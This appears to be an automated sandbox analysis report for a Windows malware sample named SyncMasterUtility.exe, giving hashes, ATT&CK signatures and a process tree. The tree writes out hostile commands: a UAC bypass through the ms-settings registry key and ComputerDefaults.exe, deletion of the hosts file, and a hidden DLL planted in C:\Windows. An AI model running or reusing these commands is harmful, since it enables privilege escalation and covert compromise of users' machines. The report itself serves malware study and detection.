Analysis
-
max time kernel
138s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
11/08/2024, 15:25
General
-
Target
SyncMasterUtility.exe
-
Size
217KB
-
MD5
dab98637d37b0462c1963dd23e0e0393
-
SHA1
8f64468546cd0cb0d900ad0db554a532e31027bc
-
SHA256
f52b9ee73c31b8f3bd95c8ef92ffc5f2d0821b454c42bd28add936b8d14bc48d
-
SHA512
f959d30ae5aedc8d51e1b8f09a844c0705c0038f061a93625d137a2330e9c5d18ab914f70404b3cd5a701332da4a0025846a638e30ef20ddee37b0d917ff14ad
-
SSDEEP
6144:DfglcIbGetWc2fJZF7mkUwDseTOEEgV/K11:DIHGF7mkUwFqG/Kz
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Modifies registry class 58 IoCs
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of FindShellTrayWindow 42 IoCs
-
Suspicious use of SendNotifyMessage 42 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\SyncMasterUtility.exe"C:\Users\Admin\AppData\Local\Temp\SyncMasterUtility.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\594634.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\594634.vbs" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\594634.vbs4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts5⤵
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\594634.vbs2⤵
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\roblox" /v name /t REG_SZ /d "extlnf61w2b3dbkkutz6qzj6txl4id:G5D8nwVeV4WckaxLM001:textpubshiers.top" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Classes\roblox" /v name /t REG_SZ /d "extlnf61w2b3dbkkutz6qzj6txl4id:G5D8nwVeV4WckaxLM001:textpubshiers.top" /f3⤵
- Modifies registry class
-
-
-
C:\Windows\System32\dllhost.exe"C:\Windows\System32\dllhost.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\431557.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\431557.vbs" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\431557.vbs5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\roblox" /v name /f6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\roblox" /v name /f7⤵
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\431557.vbs3⤵
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\100162.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\100162.vbs" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\100162.vbs5⤵
- Checks computer location settings
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c move "C:\Users\Admin\AppData\Local\Temp\9541245.tmp" "C:\Windows\ntshrui.dll"6⤵
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\100162.vbs3⤵
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\599822.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\599822.vbs" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\599822.vbs5⤵
- Checks computer location settings
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C attrib +h "C:\Windows\ntshrui.dll"6⤵
- Hide Artifacts: Hidden Files and Directories
-
C:\Windows\system32\attrib.exeattrib +h "C:\Windows\ntshrui.dll"7⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\599822.vbs3⤵
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\547499.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\547499.vbs" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\547499.vbs5⤵
- Checks computer location settings
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0 >nul6⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 07⤵
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\547499.vbs3⤵
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe/c REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f >nul3⤵
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f4⤵
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
Filesize
174B
MD570cc840760e9ac0bcdafdda1e2a5c23e
SHA1cdaa1cb4576b5ca25e9e2de31409d33188e6aa62
SHA25633ea1281ad105fde668ff5b3974b2c1381945dcab7625bd831c90a3d6953ceb5
SHA512c84058410b32457150c65fd4259d2f79f2574a1a2f02246c1a6194a1ee1468ab33e60b8897adf12f564dfb51b781c13a0de39dc8714f003c615a7fa1a1d52e5b
-
Filesize
170B
MD593bbb5381783b35439ecb13813c7e38f
SHA1f57eee3051d44f3f30099363207cd77caeb75f51
SHA256a6bf5876910b2f780db0f05c5e776ab2d9636da35df5af018107c35abab9d65d
SHA5126a125ad8235e1d954ade174096564d9aa56201c6ba5de769a207803e7135883f46abc1c9f6aca923886a948a8f15cb467c341f76f617aa9740df3aeb91bbfbfd
-
Filesize
165B
MD5b8ab7aa40b394089c50983879843a6b6
SHA16971ad7dae0dcef98adab44ceeede14803ca1446
SHA25619c34127f2a241e1e98e5df2c041ed23477878621175c8ac4d00faa56680843a
SHA512beeb9833dec545467b225e00fe14acfa7f08b8996ddd8dcab9217f7c687cf41a8a95beb571f4186672d3d2496bc354514b4af3dde7918682c08bbc45a59c8e08
-
Filesize
151B
MD537c46bb131a051ba8be6e21b601bc5d8
SHA1f97f273b2dce19abb0d12a38f02e231e2aa7f59a
SHA2564474fda1193201897ce5bc9aec29663acc6bfcd712ae0fb12aa25aec9d0b47b8
SHA512245ffd65acaa82e3fe71669ecbb3490d2dc50fa342398c7c81c7b5297155850547ad98d86403a5cfafb403503684fd1f9dc93788f42a5ceed669152b040dbb6c
-
Filesize
217B
MD57b27754f38364499d2e3ca7545e595dd
SHA1fda34f6a52c365cc923c24efe91c1e5872fb35ca
SHA2564c9a72709d68a7a8de1c0671ef22b1418d738b593d6d4a2fec2db30858be9418
SHA51203e0c9807e62a462207eb7fdec44bb07b19c80753093777c99045c168f881feab4245bc874942bb7943a4219610e04e2a8a343b5922fdffaa68828d333670303
-
Filesize
125B
MD58b4ed5c47fdddbeba260ef11cfca88c6
SHA1868f11f8ed78ebe871f9da182d053f349834b017
SHA256170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA51287e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf
-
Filesize
120B
MD52a5c3c98c3398680dd3e4caaf4283721
SHA13a3a80594c3001c51769f92bdd9e9bc71474f1bb
SHA256054e4c4699aef7aae33a8fe1c758c75d7a351ffa9f6184e59093031bebf67e70
SHA5125722337a6128d60b8110f6e5ee6618453eae3ad54320bf27dc43a6ca333c0d8333df027647a588f8fa890cb6ec7e0921b2597216ea48c593c2c6c2008603d786
-
Filesize
138KB
MD56fe439b4f5cf20c00b987658efc382ab
SHA12828e90db93c67305bffaa2c073de74f04624bf8
SHA256463dd3b1a23e58e02389bc85d414c29a345e1f68ce083dcb97f9e969b99b3e81
SHA512c269f578b399921e5701c43a4f6ee25f23427e32782af4611f65ae42f4a823751ca8a296ccb383c17cc91c0d8d4975f5a85a4a368e8e424dfb2748051941befd
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB